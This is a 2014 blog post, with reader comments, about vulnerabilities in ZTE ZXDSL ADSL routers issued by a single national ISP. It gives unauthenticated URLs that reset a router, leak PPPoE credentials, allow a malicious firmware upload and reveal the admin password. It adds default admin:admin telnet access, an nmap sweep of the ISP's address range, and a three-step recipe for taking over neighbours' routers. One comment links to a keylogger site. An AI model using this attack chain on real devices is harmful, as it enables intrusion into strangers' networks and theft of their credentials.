Thursday, September 18, 2014

ZTE ZXDSL 831 Router Exploits: Hacking and Rooting my internet neighbor

ZTE is providing a ADSL routers in my home country. Since there is only one ISP and they are giving everyone ZTE routers when they get ADSL internet I thought looking into this would be interesting. Even though different router models are given, I was surprised to find out how similarly the software operated. After testing about 7 different ZXDSL models, I think all these bugs are present in all ZTE ZXDSL routers

Here is how it started, I got a new DSL internet modem (ZTE ZXDSL 831 II) and after some use, I forgot my password. I couldn't connect to the internet nor could I simply go to 192.168.1.1 and change my credentials (it used Basic HTTP Auth to authenticate, so bruteforce was an option...) but I took it as a challenge and try to get inside without brute. so I download the firmware...

It quickly turned out that not only was I able to hack it and root it, it was also very easy to hack  all the people around me (people using broadband in the country (if you know ip range ;O -- thanks to there only being one ISP and one router it uses by default)) and then write about it.

Since I wasn't able to find a direct way to access the modem directly using the IP, I started requesting some of the pages you encounter after auth.... and turns out most of those files were returning to me without a 401 Unauthorized error (unlike the login page), which is obviously Insecure Direct Object Reference vul. I quickly realized ZTE router programmers really don't know what IDOR bugs are, almost all ZTE routers I tested after this had similar IDOR bugs letting me bypass authentication if I know the name of the page. 

note that the modem comes with admin:admin password credentials, which is enough info to pwn people using the known IP range. But for those that change their default ssh/telnet and http logins, we need a different bug.

IDOR 1: Allows Root RCE

requesting http://<router-IP>/upload.cgi didn't throw up a 401 error. it just gives the upload page, Insecure Direct Object Reference. awesome! Here, we can upload a new firmware for the router. We can add a malicious binary/shell.in the squashfs file of the firmware and upload it, granting us persistent root access.

IDOR 2: Information Disclosure

Another bug I found was awesome, requesting http://
<router-IP>/pppoe.cgi would turn out the pppoe password and username when you view source. oouch!


IDOR 3: Authentication Bypass

If an attacker, who is NOT authenticated requests http://<router-IP>/resetrouter.cgi the router would reset all settings to factory mode without any confirmation or warning.

So the root password for ssh, and HTTP interface become admin:admin again, yay!

When I port scanned it using nmap -sV 192.168.1.1 and it returned

...
23/tcp   open   telnet  ZXDSL 831CII ADSL modem telnetd 5.2.0a_E29_ET
...

While SSH is disabled by default, looks like telnet isn't. and it looks like the default username and password works. After telneting we are greeted with a terrible shell. but if you type "sh" suddenly you are greeted with a busy box shell.

# cat /proc/cpuinfo
system type             : 96338L-2M-8M
processor               : 0
cpu model               : BCM6338 V1.0
BogoMIPS                : 239.20
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : no
unaligned access                : 1289794
VCED exceptions         : not available
VCEI exceptions         : not available

Dead performance!

So I did, "cat /proc/meminfo" (6MB it holds), then "cat /proc/version" and it returned
...
Linux version 2.6.8.1 (root@host.domain.com)
...

Even though there was a public local exploit to that kernel simply typing "echo $USER" revealed I was always root. no need to root shit. Simple as that.

going to, http://192.168.1.1/menu_status.html gives public ip address of the router without auth. (aside from lots of easier ways), it was 10.136.0.16 (obvioulsy not the real IP)

so lets scan my IP range to see what we find "nmap --open -sS -sV -T4 10.136.*.*/24 -p 80 -oG - | grep 'open' "

and quickly found out at least 4800 other routers online. You know its ez:

1. Attacker goes to https://<router-ip>/resetrouter.cgi
2. telnet <router-ip> admin:admin
3. pwn!

Well, that was a fun recovery time!


Happy Hacking!

Edit: btw I contacted ZTE and they said they will make better routers in the future, and will not be realizing patches for these modules.

Conclusion: ZTE makes bad routers, most "different models" run the same services, similar holes. it wasnt built in having security in mind. run if you see one! dont buy it! sue me!

and ya, disable remote logins to telnet, http etc. ;)

5 comments:

  1. Our countries internet security is the biggest lie. some fuckers like the ZTE control and surveillance us, I say no more! lets keep this things out there. in the wild. like you did. probably teach people a lesson! probably!

    ReplyDelete
  2. can u get more internet speed with dis or not

    ReplyDelete
  3. You should be aware of someone using http://spying.ninja/keylogger/ to steal your wi-fi password.

    ReplyDelete
  4. Can we use this to change internet speed. Or is internet speed controlled somewhere else.

    ReplyDelete
  5. You don't need to reset the router to access forgotten admin password. Just got to http://192.168.1.1/adminpasswd.cgi.

    ReplyDelete

Note: Only a member of this blog may post a comment.